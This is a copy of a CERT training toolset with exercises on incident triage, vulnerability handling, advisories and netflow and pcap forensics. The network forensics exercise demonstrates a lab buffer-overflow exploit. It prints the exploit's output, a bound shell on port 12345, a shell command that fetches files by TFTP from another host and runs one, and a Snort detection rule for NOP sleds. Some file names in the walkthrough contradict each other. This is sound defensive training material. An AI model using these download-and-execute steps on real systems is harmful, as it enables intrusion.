cert exercise toolset

Upload: white-lion

Post on 03-Jun-2018


8/12/2019 CERT Exercise Toolset (1/52)


Table of contents

Exercise 1: Triage and Basic Incident Handling (page 2)
Exercise 2: Incident Handling Procedure Testing (page 7)
Exercise 3: Recruitment of CERT Staff (page 10)
Exercise 4: Developing CERT Infrastructure (page 14)
Exercise 5: Vulnerability Handling (page 16)
Exercise 6: Writing Security Advisories (page 18)
Exercise 7: Network Forensics (page 21)
Exercise 8: Establishing External Contacts (page 37)
Exercise 9: Large-scale Incident Handling (page 40)
Exercise 10: Automation in Incident Handling (page 44)
Exercise 11: Incident Handling in Live Role Playing (page 46)
Exercise 12: Cooperation with Law Enforcement Agencies (page 47)

Exercise 1: Triage and Basic Incident Handling

    EXERCISE TASK

You are an incident response investigator working for Utopia CERT. This team is part of a research and academic network in Utopia, a decent ISP serving universities and high schools. As the oldest and most recognised IRT in Utopia, your team is quite often approached about all security incidents happening in your country. You maintain good relationships with other providers and have secure and effective ways of sharing information with them.

You start your work at 8 am with 9 reports in your mailbox. Read through them and try to understand what really happened and what the reporters' expectations are. How are you going to handle them? Whom will you contact and what information will you share? For each report, assign ONE type from your classification scheme and give a priority of high, medium or low, determining the order in which you would handle the incidents. Make sure you are ready to explain your decisions and keep in mind that you are the decision-maker here: there is no single correct answer.

Unless instructed otherwise by the trainer, launch the Icedove mail client from the LiveDVD. You will find the incident reports in the Inbox.

The reports are taken from real life. They were anonymised according to the following rules:

• 10/8 are networks located in Utopia;
• 10.187/16 are networks of the Utopia NREN; and
• .ut is Utopia's top-level domain.

    WHAT WILL YOU LEARN?

This exercise will give you some practice in triage, the initial incident handling phase, covering:

• verification of the report (did the incident actually occur?);
• interpretation (what actually happened?);
• determination of the scope of the incident (what are the actual and possible consequences for your constituency and others?);
• classification; and
• prioritisation (based on the previous factors).

After finishing the exercise you should understand what to focus on during initial analysis, how different factors may affect priorities, and how to communicate with reporters as well as third parties.


The classification scheme used in Utopia CERT [1]:

| Incident Class (mandatory input field) | Incident Type (optional but desired input field) | Description / Examples |
|---|---|---|
| Abusive Content | Spam | Unsolicited bulk e-mail, which means that the recipient has not granted verifiable permission for the message to be sent and that the message is sent as part of a larger collection of messages, all having an identical content. |
| Abusive Content | Harassment | Discrediting, or discrimination against, somebody (ie, cyberstalking). |
| Abusive Content | Child/Sexual/Violence/... | Child pornography, glorification of violence, ... |
| Malicious Code | Virus, Worm, Trojan, Spyware, Dialler | Software that is intentionally included or inserted in a system for a harmful purpose. A user interaction is normally necessary to activate the code. |
| Information Gathering | Scanning | Attacks that send requests to a system to discover weak points. This also includes some kinds of testing processes to gather information about hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, ...). |
| Information Gathering | Sniffing | Observing and recording network traffic (wiretapping). |
| Information Gathering | Social Engineering | Gathering information from a human being in a non-technical way (eg, lies, tricks, bribes, or threats). |
| Intrusion Attempts | Exploiting Known Vulnerabilities | An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as a CVE name (eg, buffer overflow, backdoors, cross-site scripting, etc). |
| Intrusion Attempts | Login Attempts | Multiple login attempts (guessing or cracking passwords, brute force). |
| Intrusion Attempts | New Attack Signature | An attempt using an unknown exploit. |
| Intrusions | Privileged Account Compromise, Unprivileged Account Compromise, Application Compromise | A successful compromise of a system or application (service). This could have been caused remotely by a known or a new vulnerability, but also by an unauthorised local access. |
| Availability | DoS, DDoS, Sabotage | In this kind of attack, a system is bombarded with so many packets that the operations are delayed or the system crashes. Examples of a remote DoS are SYN-a, PING-flooding or e-mail bombing (DDoS: TFN, Trinity, etc). However, availability can also be affected by local actions (destruction, disruption of power supply, etc). |
| Information Security | Unauthorised Access to Information, Unauthorised Modification of Information | Besides the local abuse of data and systems, information security can be endangered by a successful account or application compromise. Furthermore, attacks that intercept and access information during transmission (wiretapping, spoofing or hijacking) are possible. |
| Fraud | Unauthorised Use of Resources | Using resources for unauthorised purposes, including profit-making ventures (eg, the use of e-mail to participate in illegal chain letters for profit or pyramid schemes). |
| Fraud | Copyright | Selling or installing copies of unlicensed commercial software or other copyright protected materials (Warez). |
| Fraud | Masquerade | Type of attacks in which one entity illegitimately assumes the identity of another in order to benefit from it. |
| Other | All incidents which do not fit in one of the given categories should be put into this class. | If the number of incidents in this category increases, it is an indication that the classification scheme needs to be revised. |

[1] This classification was developed during the eCSIRT.net project on CERT cooperation and common statistics. More information can be found at: http://www.ecsirt.net/cec/service/documents/wp4-clearinghouse-policy-v12.html#HEAD6

Complete the table below to assign an appropriate classification and priority to each of the reports. The priority should be a number between 1 and 3: 1 = top priority, 2 = normal priority, 3 = low priority.

| # | Report Subject | Classification | Priority | Suggested Actions |
|---|---|---|---|---|
| 1 | (from: UKSUtopia Inspections) | | | |
| 2 | Abuse: 10.187.137.4 | | | |
| 3 | [SpamCop (http://www.company.ut/) id:3091085703] 3-4 June Workshops for Managers | | | |
| 4 | [CERTPT #56817] Unauthorised access attempt registered | | | |
| 5 | Incident 10.187.21.203 | | | |
| 6 | [SpamCop (http://www.bigoil.ut/cgi-bin/internet.exe/portal/ep/home.do?tabId=0) id:3120641650]---- BIGOIL CO. Search (Immediate Part-Time JOB for | | | |
| 7 | Incident 10.187.108.39 | | | |
| 8 | Bank Phish Site [211889] Please Reply | | | |
| 9 | [MBL# 89603] Malware Block List Alert | | | |

Exercise 2: Incident Handling Procedure Testing

WHAT WILL YOU LEARN?

In this exercise you will learn how to build your own incident handling procedure: how to identify the most important players in this procedure, the critical points and the most suitable means of communication.

• You will become familiar with the basic set of activities relating to the incident handling process.
• You will learn the correct sequence of activities during the incident handling process.
• You will gain knowledge about the most important parts of the IH procedure, those that have a critical influence on the success of the process, which will be provided to you.
• You will become familiar with all possible players in the IH process.
• You will learn the most effective methods for cooperation between a CSIRT and the key incident handling players.

EXERCISE TASKS

Task 1: Developing incident handling procedure

Using the incident handling procedure objects, form a complete incident handling procedure. Make the proper sequence of the activities, build relationships between them, and show the directions of the work flows. Additionally, extend the procedure with your proposals for activities using the blank objects.

After forming a procedure, identify the activities which require communication with external parties. For each of them, indicate the recommended means of communication (eg, a normal e-mail, a phone, an encrypted e-mail, etc).

Analyse your procedure. Point out the critical elements and identify the potential problems which could appear during execution of a procedure.

Use Appendix 1 for this task.


    Appendix 1


Exercise 3: Recruitment of CERT Staff

WHAT WILL YOU LEARN?

The purpose of this exercise is to improve your ability to optimally recruit staff for the CERT team. You will learn:

• what kind of professional experience and/or qualifications, as well as personal abilities, are essential to fulfil the main roles and responsibilities of a CERT;
• what kinds of questions should be asked during a job interview; and
• how to choose the most suitable candidates for the CERT team.

EXERCISE TASKS

Task 1: Writing job advertisements for recruiting CERT staff

You will be either a member of the Technicians or Researchers group. The task of your group is to complete a job advertisement template for positions in either the Incident Handling Service or the Security Project Development Team respectively (see Appendix A). Be prepared to present your job advertisement proposal to others.

Task 2: Analysing and choosing candidates to be interviewed

Each group will receive a collection of 6 CVs. Analyse all the CVs and try to match them with the prepared job offers. Write short opinions about all the candidates (strong and weak points, pros and cons in several aspects). Be prepared to present your opinions about all candidates and justify your choice.

Task 3: Interviews with chosen candidates

Read the code of conduct developed by TF CERT. Using the CoC, your prepared job advertisement and the CVs of the chosen candidates, propose up to 20 interview questions (5 general, 5 technical, 10 others) that you would like to ask the candidates of your choice. (Use the blank template in Appendix B.)

Be prepared to present your questions to others and explain which of them you find the most useful. The trainer will also propose a few questions and let you decide which of them you consider important. Decide on a set of 10 questions to be asked of a chosen candidate. After a 15 minute break, volunteers from each group will play the roles of the chosen candidates and the others will start to interview them. Every group joins all the interview sessions. After each interview, the groups individually discuss the candidates' answers and share opinions.

Task 4: Final selection of the best candidates

After all the interviews, prepare your own opinion about all the candidates and make your selection (with justifications). Then vote for the candidates.

Appendix A: Job Advertisement for IT Security Specialist (Incident Handling Service)

Main tasks:

• Handling network security incidents
• Operating the CERT early warning and alerting system for a CERT constituency
• Writing security advisories
• Writing security news
• Preparing CERT reports

Essential requirements (technical qualifications, knowledge and personal skills):

Additional assets:

We offer:

Job Advertisement for IT Security Specialist (Incident Handling Service)

Main tasks:

• Participation in projects related to the security network
• Carrying out research on new methods for the detection and analysis of malicious software
• Development of concepts for IT projects to pursue new solutions
• Cooperation with software engineers in the implementation of the proposed solutions
• Testing developed applications
• Writing technical documentation
• Development of IT security policies

Essential requirements (technical qualifications, knowledge and personal skills):

Additional assets:

We offer:

Appendix B: Job Interview Questions Form

(Fill in one column per candidate: Candidate 1 | Candidate 2)

I. General issues: 1. 2. 3. 4. 5.

II. Technical knowledge and qualifications: 1. 2. 3. 4. 5.

III. Personal skills: 1. 2. 3. 4. 5.

IV. Facultative questions: 1. 2. 3. 4. 5.

Exercise 4: Developing CERT Infrastructure

WHAT WILL YOU LEARN?

The aim of this exercise is to provide you with an understanding of the software tools and hardware required by a CERT in order to offer a service.

EXERCISE TASKS

Although the roles and functions of CERTs vary, there are many common services provided by different CERTs. The trainer will give you a general introduction to common CSIRT service models. A suggested model for this exercise is presented at http://www.cert.org/csirts/services.html. You will create a concept for providing these services. The trainer will act as a mentor, asking leading questions to help you find your way. An example service, Incident Handling (Incident Analysis), will be completed at the beginning, with the trainer playing a more important role to give you a better understanding of how you should proceed. Handouts with network diagrams will be provided to make your task easier.

Task 1: Incident Handling (Incident Analysis)

Attached below you will find diagrams showing the infrastructure of a new CERT. This CERT is expected to provide an incident handling service. Your task is to answer the questions of the trainer regarding the infrastructure needed to provide the service. Is the architecture, as presented, sufficient? Do you have ideas on what software will be required? Any suggestions for improvements?

Task 2: Further 3-5 services

Together with the trainer, choose 3-5 services as described in the CERT document. Modify and expand the existing infrastructure shown in the diagrams below in order to achieve your desired goal of providing these services. Enumerate the software you would use.


Exercise 5: Vulnerability Handling

WHAT WILL YOU LEARN?

The objective of this exercise is to give you a practical overview of the vulnerability handling process and how vulnerabilities reported to a CERT team should be handled. You will learn:

• what the main responsibilities of a CERT team involved in a vulnerability case are;
• how to design a vulnerability disclosure policy suitable for your CERT; and
• how to deal with difficult situations that may arise through your role as a coordinator.

EXERCISE TASKS

Task 1: Responsibilities of a CERT team in a vulnerability case

You will hear a description of a typical vulnerability case. Your task is to identify the CERT's main responsibilities and activities in handling the reported vulnerability.

Think about the responsibilities which the CERT has as coordinator towards the vendor and the reporter of the vulnerability.

Name the actions that the CERT has to take to resolve the case.

Keep in mind that the CERT team always acts as an independent coordination centre.

Task 2: Vulnerability disclosure

The vulnerability handling process always involves the problem of disclosing information about the vulnerability. What is your opinion on vulnerability disclosure? Do you think this information should be kept secret or publicly disclosed? Think about the advantages and disadvantages of disclosing a vulnerability.

Task 3: Designing a vulnerability disclosure policy

Now you have some ideas as to what responsible vulnerability disclosure should be. What main aspects should be addressed in a vulnerability disclosure policy? Develop a general policy for your CERT.

Task 4: Role-playing game: Introducing CERT coordination in a vulnerability case

The trainer will tell you two stories. One will be a true story from the past, based on the Michael Lynn case: http://en.wikipedia.org/wiki/Michael_Lynn. The second one is a scenario which will be used in the game.


The rules of the role-playing game:

• The trainer is the game leader. A game leader has absolute power to shape, modify and adjust a game scenario; ie:
  - he can stop an action and introduce new factors and new conditions;
  - he can rewind an action to change factors or conditions or actions already performed; and
  - he can accelerate an action to avoid valueless activities.
• All students must fit their actions to what the trainer decides.
• Students can communicate during a role-playing game only as players, not as students (eg, they are not allowed to comment on an action, unless the trainer changes it).
• A main purpose of the trainer is to achieve the goals of the exercise.

Task 5: Identification of vulnerability handling phases

During this post role-playing activity, students are given the task of identifying as many activities and processes as possible. This is achieved by a kind of brain-storming session with the trainer as the group leader.

Task 6: Coordination of a single and multiple vendor case

During the game in the previous task, you dealt with a single vendor case. It may happen, however, that a reported vulnerability affects more than one vendor. Think about the possible complications in a multiple vendor case. The trainer will give you some tips on the aspects you should consider especially carefully.

Exercise 6: Writing Security Advisories

DNS CVE-2008-1447 Checklist:

| Checklist criterion / Document | US-CERT (TCSA) | US-CERT (VN) | NVD NIST | SecurityFocus | Secunia | Microsoft | ISC |
|---|---|---|---|---|---|---|---|
| Problem name and ID | | | | | | | |
| Threat severity and impact | | | | | | | |
| Affected systems | | | | | | | |
| Description | | | | | | | |
| Possible remedies (solutions, workarounds, patch locations) | | | | | | | |
| References | | | | | | | |
| Revision notes | | | | | | | |
| Other fields: digital signatures, contact information? | | | | | | | |
| How informative? | | | | | | | |
| Structure of the documents? | | | | | | | |
| Additional comments | | | | | | | |

PART 2: CVSS TRAINING

This part of the exercise is devoted to learning the basics of CVSS.

Task 1: CVSS basics and tools

Listen carefully to the introduction to CVSS by the trainer. Click through the available CVSS calculators; you will need to use them for the next tasks.

Task 2: CVSS vectors and metrics of the DNS CVE-2008-1447 vulnerability

Together with the trainer, you will calculate CVSS scores for the DNS CVE-2008-1447 vulnerability.

Task 3: Calculating CVSS scores by yourself

In this task, students will be split into smaller groups. Your group should create a short description of an organisation and its network. Next, pick a security vulnerability found in an advisory and calculate its CVSS scores. The trainer may introduce different variants of this exercise.

Exercise 7: Network Forensics

WHAT WILL YOU LEARN?

The network forensics exercise is aimed at introducing you to the post-mortem analysis of pcap file dumps and Cisco netflow logs. In particular you will:

• learn how worms and botnets infect machines;
• learn about client side attacks and fast flux networks;
• learn what DDoS attacks look like from an ISP's viewpoint; and
• learn about the tools used for analysing these attacks after the fact.

EXERCISE TASKS

The exercise is split into three different parts, each composed of two scenarios (tasks). At the start of the exercise, you will be given a brief introduction to the field of network forensics. The trainer will then introduce you to the world of buffer overflows, which will help you analyse the pcap traces.

The exercise list is as follows:

• pcap trace analysis: server side attack;
• pcap trace analysis: client side attack;
• netflow analysis.

PART 1: PCAP TRACE ANALYSIS, SERVER SIDE ATTACK

The exercise is divided into two separate scenarios:

• a demonstration performed by the teacher as the introductory scenario; and
• network forensics skills training with the logs of a real attack.

Task 1: Introductory scenario: fake web server vulnerability exploitation step-by-step

In this scenario, you will be led through a step-by-step explanation of the exploitation and infection process performed against a server application.

This demonstration covers the whole process of the exploitation of a server side service. A specially prepared vulnerable HTTP server was implemented. The server obeys the rules of the HTTP protocol when it receives GET requests. However, whenever a POST request is received, a separate thread will be launched to bind a shell to port 12345. Assuming that the POST request will inject proper shellcode, this fake exploitation does not differ from a real one from the standpoint of the network. Shellcode that binds a command shell to port 12345 was obtained from the Metasploit framework (http://www.metasploit.org).

During the exploitation process, you should use the Wireshark network analyser to capture the traffic. Wireshark will capture all the packets that were received and transmitted on a particular network interface. The next step in the exercise is a discussion concerning the subsequent stages of the attack as seen through Wireshark.

Tools necessary for carrying out this exercise

The following are the tools necessary for conducting this exercise. These tools can be found on the LiveDVD (/usr/share/exercises/07_NF/adds/):

• http server;
• exploit (/usr/share/exercises/07_NF/adds/exploit);
• wireshark;
• tftp server; and
• tftp client.

Before running the vulnerable HTTP server, make sure that the Apache server has been stopped. (Remember to restart it again to carry out other exercises later on!):

    sudo /etc/init.d/apache2 stop

To run the server type:

    sudo /etc/init.d/http_server

The exploits can be found in the exercise directory.

The exercise can be demonstrated using one machine only or on a set of two machines. In the case of a single machine presentation, the attacking machine will have the same IP address as the victim. As this situation is unlikely in a real scenario, it is recommended that two machines be used for this exercise if possible. The two machine scenario is illustrated below:

Both computers should be booted with the Exercise LiveDVD. To configure the interfaces appropriately, run the scripts provided on the Exercise LiveDVD: interface_victim and interface_attacker. If the computer has multiple interfaces, provide the name of the one to be configured as a parameter to the script:

    interface_victim eth1

If no parameters are provided, the scripts will configure the first interface.

Further descriptions of the exercise assume that only one machine was used during the exercise, which means that the victim's and attacker's IP address is 127.0.0.1. In the case of a two-machine presentation, in all the following commands the attacker's address should be replaced with 192.168.0.2 and the victim's with 192.168.0.1.

The pcap file attached to this exercise on the LiveDVD (/usr/share/exercises/07_NF/adds/) contains logs of attacks launched from an IP address which is different from the victim's.

Step-by-step demonstration

Before launching the exploit, a benign request to the HTTP server can be sent. Run Wireshark and start a live capture on the loopback interface. Now, run the browser and go to the www.example1.com site. This example site is served locally. To increase the amount of benign requests, perform some interaction with this simple site.

The exploit will result in the copying of some files from the attacker to the victim machine. Files will be copied to the home directory of the user who ran the HTTP server. As the HTTP server was run with root privileges, the files will be copied to the /root/ directory and all actions performed by the compromised server will use the privileges of the super-user. This example shows why services should be run with only a minimal set of privileges!

Before running the exploit, check the list of files in the home directory of the root user. In the console, type: ls ~. Now, run the exploit. There are two options to be given: the victim's IP address and the TFTP server IP address. Both addresses are the same as the local loopback interface: 127.0.0.1. Change the working directory to the exercise directory and type:

    ./exploit -h 127.0.0.1 -t 127.0.0.1

The consecutive actions that the exploit undertakes will be reported to the console:

    [*] Connecting to vulnerable HTTP Server...done
    [*] Sending buffer overflow data...done
    [*] Attempting to connect to shell: 127.0.0.1:12345...succeeded
    [*] Sending commands to compromised server...done
    [*] Bye!

The packets which caused this successful exploitation were captured by Wireshark and can now be investigated.

To single out the packets which were sent to the HTTP server, apply the following filter:

The first HTTP request was performed by the web browser. The filter allows the tracking of all the packets that were sent:

    Source     Destination  Protocol  Info
    127.0.0.1  127.0.0.1    TCP       55177 > www [SYN]
    127.0.0.1  127.0.0.1    TCP       www > 55177 [SYN, ACK]
    127.0.0.1  127.0.0.1    TCP       55177 > www [ACK]
    127.0.0.1  127.0.0.1    HTTP      GET / HTTP/1.1
    127.0.0.1  127.0.0.1    TCP       www > 55177 [ACK]
    127.0.0.1  127.0.0.1    HTTP      Continuation or non-HTTP traffic
    127.0.0.1  127.0.0.1    TCP       55177 > www [ACK]
    127.0.0.1  127.0.0.1    TCP       www > 55177 [FIN, ACK]
    127.0.0.1  127.0.0.1    TCP       55177 > www [FIN, ACK]
    127.0.0.1  127.0.0.1    TCP       www > 55177 [ACK]
    127.0.0.1  127.0.0.1    TCP       55178 > www [SYN]
    127.0.0.1  127.0.0.1    TCP       www > 55178 [SYN, ACK]
    127.0.0.1  127.0.0.1    TCP       55178 > www [ACK]
    127.0.0.1  127.0.0.1    HTTP      GET /favicon.ico HTTP/1.1
    127.0.0.1  127.0.0.1    TCP       www > 55178 [ACK]
    127.0.0.1  127.0.0.1    HTTP      Continuation or non-HTTP traffic
    127.0.0.1  127.0.0.1    TCP       55178 > www [ACK]
    127.0.0.1  127.0.0.1    TCP       www > 55178 [FIN, ACK]
    127.0.0.1  127.0.0.1    TCP       55178 > www [FIN, ACK]
    127.0.0.1  127.0.0.1    TCP       www > 55178 [ACK]

There are two HTTP requests: one for the index.html page and one for the favicon.ico file. A malicious POST request was sent by the exploit:

    127.0.0.1  127.0.0.1    TCP       54274 > www [SYN]
    127.0.0.1  127.0.0.1    TCP       www > 54274 [SYN, ACK]
    127.0.0.1  127.0.0.1    TCP       54274 > www [ACK]
    127.0.0.1  127.0.0.1    HTTP      POST /inventory-check.cgi HTTP/1.1
    127.0.0.1  127.0.0.1    TCP       www > 54274 [ACK]
    127.0.0.1  127.0.0.1    HTTP      Continuation or non-HTTP traffic
    127.0.0.1  127.0.0.1    TCP       www > 54274 [ACK]
    127.0.0.1  127.0.0.1    TCP       54274 > www [FIN, ACK]
    127.0.0.1  127.0.0.1    TCP       www > 54274 [ACK]

The fourth packet carries the POST request. The request consists of two packets and the body of the HTTP request carries the actual exploit shellcode, which is to be executed. The shellcode is basically a long string of bytes of value 0x90 (the x86 NOP instruction) followed by almost 90 bytes of assembler instructions (the first four bytes of the shellcode are the address which overwrites the function return address). Due to the execution of the shellcode, port 12345 is opened with the system shell bound to it. This is the end of the interaction with the HTTP server.

As we know that the exploit opens port 12345, the traffic sent to this port can be investigated. To do this, a proper filter, which will single out all the traffic targeted at or coming from port 12345, should be applied:


The filter results are as follows:

    127.0.0.1  127.0.0.1    TCP       57620 > 12345 [SYN]
    127.0.0.1  127.0.0.1    TCP       12345 > 57620 [SYN, ACK]
    127.0.0.1  127.0.0.1    TCP       57620 > 12345 [ACK]
    127.0.0.1  127.0.0.1    TCP       57620 > 12345 [PSH, ACK]
    127.0.0.1  127.0.0.1    TCP       12345 > 57620 [ACK]
    127.0.0.1  127.0.0.1    TCP       57620 > 12345 [FIN, ACK]

From the packet's payload we can see that, after a TCP connection had been initiated, the following string of commands was sent to the shell:

    cd ~; atftp --get --remote-file exploit2 192.168.0.121;
    atftp --get --remote-file hello 192.168.0.121; chmod +x hello; ./hello

We have already discussed the meaning of these commands in the previous paragraphs.

In the next step, the exploit and xhttp files are downloaded onto the victim's machine. To see the TFTP protocol packets, apply the following filter:

    tftp

To find the names of the files which were downloaded, it is more convenient to apply a filter that shows only the first packet of each TFTP transmission:

    tftp.source_file

Now, list the contents of root's home directory. The downloaded files, xhttp and exploit, should be there. One of the commands which was executed launched xhttp. Check if this program is still running:

    ps aux | grep xhttp

The output should show that a process named xhttp is running.


    The last point in this presentation of the attack is to check whether an intrusion detection systemnoticed anything suspicious. The Exercise LiveDVD contains Snort IDS. Alerts are reported in file:/var/log/snort/alert

    To check for the latest alerts, type command:cat /var/log/snort/alert

    You should notice one alert:

    [**] [1:1000002:0] SHELLCODE x86 NOOP [**][Priority: 0]

    06/14-16:35:30.367355 127.0.0.1:36944 -> 127.0.0.1:80

    TCP TTL:64 TOS:0x0 ID:51437 IpLen:20 DgmLen:672 DF

    ***AP**F Seq: 0x2981E148 Ack: 0x6A7EC3DF Win: 0x2E TcpLen: 32TCP Options (3) => NOP NOP TS: 2107818 2038899

    The alert was triggered by the following Snort rule:

    alert ip any $SHELLCODE_PORTS -> $HOME_NET any \
        (msg:"SHELLCODE x86 NOOP"; \
        content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
        depth:128; reference:arachnids,181; classtype:shellcode-detect; sid:648; rev:7;)

    This rule alerts whenever a monitored network receives a packet whose first 128 bytes of payload contain at least 14 consecutive bytes of value 0x90 (the x86 NOP opcode). The event is triggered because such a string is often an indication of a shellcode NOP sled. The rule comes from the standard set of Snort rules.
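As an added example (not code from the toolset), the following emulates how the rule's content and depth options decide on a payload, including the case where the NOP run straddles the 128-byte boundary, and extracts the fields an analyst triages on from an alert entry like the one above. The payloads are constructed; the alert text is the one quoted above.

```python
import re

# Rule options taken from the Snort rule quoted above.
NOP_SLED = b"\x90" * 14   # content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90|"
DEPTH = 128               # depth:128 -> only the first 128 payload bytes are searched


def rule_matches(payload: bytes, content: bytes = NOP_SLED, depth: int = DEPTH) -> bool:
    """Emulate Snort's content/depth test: the whole pattern must lie within
    the first `depth` bytes of the payload, so a run that starts inside the
    window but ends beyond it does not fire."""
    return content in payload[:depth]


ALERT_HEADER = re.compile(r"\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]")
ALERT_FLOW = re.compile(r"(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+):(\d+) -> (\S+):(\d+)")


def parse_alert(text: str) -> dict:
    """Pull generator id, signature id, revision, message, timestamp and the
    source/destination endpoints out of one entry of Snort's 'alert' file."""
    header = ALERT_HEADER.search(text)
    flow = ALERT_FLOW.search(text)
    if not header or not flow:
        raise ValueError("not a recognisable Snort alert entry")
    gid, sid, rev, msg = header.groups()
    ts, src, sport, dst, dport = flow.groups()
    return {
        "gid": int(gid), "sid": int(sid), "rev": int(rev), "msg": msg,
        "timestamp": ts, "src": src, "sport": int(sport),
        "dst": dst, "dport": int(dport),
    }


# Constructed payloads (not taken from the exercise pcap).
SAMPLES = {
    "sled_at_start": NOP_SLED + b"\xcc" * 50,             # fires
    "thirteen_nops": b"\x90" * 13 + b"A" * 100,           # one byte short
    "sled_ends_at_128": b"A" * 114 + NOP_SLED + b"B" * 20,  # last byte is #127
    "sled_crosses_128": b"A" * 120 + NOP_SLED + b"B" * 20,  # straddles depth
    "sled_after_depth": b"A" * 200 + NOP_SLED,            # outside depth
}

# The alert entry quoted above, as it appears in /var/log/snort/alert.
ALERT_TEXT = """[**] [1:1000002:0] SHELLCODE x86 NOOP [**]
[Priority: 0]
06/14-16:35:30.367355 127.0.0.1:36944 -> 127.0.0.1:80
TCP TTL:64 TOS:0x0 ID:51437 IpLen:20 DgmLen:672 DF
"""

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        verdict = "ALERT" if rule_matches(payload) else "no match"
        print(f"{name:18s} -> {verdict}")
    print(parse_alert(ALERT_TEXT))
```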

    PART 2 PCAP TRACE ANALYSIS CLIENT SIDE ATTACK

    The next two scenarios are intended to be carried out by you with minimal assistance from the trainer.


    Dabber scenario

    The second scenario of this exercise involves analysing the workings of the Dabber worm. To perform this exercise, you need to load the Dabber pcap file (/usr/share/exercises/07_NF/adds/). Analyse this pcap trace using the knowledge gained in the previous scenario and explain what happened, enumerating the stages of the attack, what ports were involved in the attack, and how the exploit worked.

    Task 2

    Drive-by download without fast flux

    Using the tools and knowledge acquired in the previous exercises, analyse the pcaptraces found on disk and answer the following questions in detail:

    What happened (step-by-step)?
    Has the host been infected? If yes, what type of malware is it?
    How is the attack being carried out?
    What domains and IPs are involved in the attack?
    How could we mitigate the attack?

    Task 1


    Q 1 When did the attack begin?

    GUI: Open the web browser and go to http://10.20.31.210/nfsen/nfsen.php. For a better view you can go to the Graphs tab. You can see a huge increase in file size near Feb 24 2007 04:00.

    CLI: Go to the directory /data/nfsen/profiles-data/live/upstream and list the netflow files (nfcapd.*); use ls -l (or the more human-readable ls -lh).

    You can see that starting from 200702240400 the files are suddenly larger than before (before, about 100-200 kB; from 200702240400, more than 10 MB). Near 200702241050 the files are getting smaller, but are still unusually large (about 6 MB). From about 200702241605, the size of the files seems to drop to normal levels.

    So, the attack began around 04:00 on 24th February 2007.

    Q 2 What is being attacked?

    GUI: In order to identify what is being attacked, it is useful to analyse the details of the graphs and the TOP N statistics, generated both after and before the attack. Graphs and TOP N statistics generated before the attack started can be treated as a baseline for comparison with later analysis.

    Go to the Details tab (1). Pick Time Window from the list in the Select field (2). On the graph, select an area (3) that looks like normal activity before the attack started. This is about from 20:00 23 Feb 2007 to 03:50 24 Feb 2007. Look at the statistics (4) for this timeslot. (You should also use the Sum radio button.) This will tell you that most of the activity was TCP.


    Next, select an area on the graph that looks like the attack (from 04:00 24 Feb 2007 to about 16:05 24 Feb 2007). The statistics say that most of the activity (flows, packets and traffic) was UDP.

    Let us find out what is being attacked. Use netflow processing (reducing the time window, which in this example was on Feb 24 from 04:00 to 09:00, to accelerate this process) to find the top 10 statistics about the destination IP ordered by flows, packets, bytes or bits per second (bps). On the screen below you can see the statistics generated by the packets.


    There are 5 hosts that generate huge traffic to the attacked server. These IPs are the potential attackers:

    33.106.25.243
    207.39.221.61
    213.63.169.117
    43.170.142.79
    33.106.23.177


    Q 3 What IPs are involved in carrying out the attack?

    GUI: A quick way of checking what IPs may be involved in an attack against an IP is to generate statistics filtered towards that specific destination IP. In this case we can filter for the TOP N attacking source IPs based on flows against 195.88.49.121.

    Use netflow processing. Select the time window from 2007-02-24-04-00 to 2007-02-24-09-00. Generate the TOP 20 statistics about the source IP, using the dst host 195.88.49.121 filter.


    By modifying the filter (dst host) you can investigate the behaviour of each attacking IP separately.

    CLI: In the command line interface, you could use the following command:

    nfdump -R nfcapd.200702240410:nfcapd.200702240900 -o extended -c 50 'dst ip 195.88.49.121 and (src ip 33.106.25.243 or src ip 207.39.221.61 or src ip 213.63.169.117 or src ip 43.170.142.79 or src ip 33.106.23.177)'

    Modify the dst host accordingly.

    Conclusion: The attacking IP was sending UDP packets to a WWW server on many different destination ports, but always from the same source port. All these five attacking IPs sent packets simultaneously. All the packets had the same size: 29 B.

    Q 5 Where did the attack come from?

    One issue that frequently arises for DDoS attacks is the question whether the source IPs are spoofed. With UDP DDoS attacks, this is usually quite likely. For TCP-based attacks, flows can be used to deduce what flags were seen for connections, allowing for speculation as to whether an attack was spoofed or not. To track where an attack came from, one can also use netflow to observe the router interfaces from which the traffic entered. With the interface information it is possible to identify the uplink, which can be used in turn to check its uplink and so on. This can also be used to discover whether spoofing was involved.

    CLI: For example, to see what flags were set:

    nfdump -R nfcapd.200702240410:nfcapd.200702240500 -c 50 -o extended 'dst ip 195.88.49.121 and (src ip 33.106.25.243 or src ip 207.39.221.61 or src ip 213.63.169.117 or src ip 43.170.142.79 or src ip 33.106.23.177)'

    For example, to see the interfaces where the packets came from:

    nfdump -R nfcapd.200702240410:nfcapd.200702240500 -o fmt:%in 'src ip 33.106.25.243' | sort -u

    Q 6 What could be done to mitigate the attack at the ISP level?

    Some possible suggestions for attack mitigation might include the following:

    If the attacked server is only a WWW server, without other services, you could block all UDP traffic. This prevents repeated attacks from new IPs.
    You could block UDP traffic destined only to high-numbered ports (for example, if the attacked server is also a DNS server and you cannot block all UDP traffic, you could block all UDP ports above 53).
    Rate limiting of UDP traffic is also a possibility.

    When you finish Task 1, run the nfsen_stop script available on your LiveDVD Desktop. (You can click on it.)


    Task 2 can be found on the LiveDVD #2: Network Forensics Task 2.

    Make sure that the Apache server is running. Run the nfsen_start script available on your LiveDVD #2: Network Forensics Task 2 Desktop. (You can click on it.)

    When you finish Task 2, run the nfsen_stop script available on your LiveDVD #2: Network Forensics Task 2 Desktop. (You can click on it.)

    DDoS Analysis (DIY)

    In a similar manner to the first Task, you are required to analyse another DDoS attack. This time, you are expected to carry out the analysis with minimal help from the trainer. You are expected to:

    identify when the attack began;
    identify what is being attacked;
    identify the IPs involved in carrying out the attack;
    identify the way the attack is being carried out;
    identify where the attack is coming from; and
    suggest ways of mitigating the attack at the ISP level.

    Task 2


    Exercise 8: Establishing External Contacts

    EXERCISE TASKS

    WHAT WILL YOU LEARN?

    The communication and exchange of information is one of the crucial aspects of a CERT's work. The more effectively information is shared and exchanged between interested parties, the faster security incidents can be mitigated and the less damage occurs. Thus, it is very important to have at hand and to know how to use sources of contact information, networks of contacts and other channels for the distribution and sharing of data.

